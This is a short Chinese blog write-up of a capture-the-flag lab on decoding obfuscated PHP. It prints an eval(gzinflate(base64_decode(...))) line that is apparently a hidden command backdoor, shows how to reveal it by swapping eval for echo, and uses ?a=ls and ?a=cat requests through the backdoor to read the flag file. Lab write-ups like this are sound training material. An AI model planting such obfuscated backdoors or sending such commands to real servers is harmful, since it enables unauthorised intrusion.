墨者学院 - PHP代码分析溯源(第4题)

2018-09-23  本文已影响0人  这是什么娃哈哈

打开目标网址,提示flag在根目录

eval(gzinflate(base64_decode(&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&)));

?>

这是gzinflate+base64_decode加密

最简单方法就是直接把eval改成echo输出,用php在线工具即可,附上php在线工具的网址:https://c.runoob.com/compile/1

echo gzinflate(base64_decode("40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA=="));

?>

 输入http://ip地址/f.php?a=ls    可以看到key文件,

 输入http://ip地址/f.php?a=cat key_206292865031875.php  查看源代码即可获取key

上一篇 下一篇

猜你喜欢

热点阅读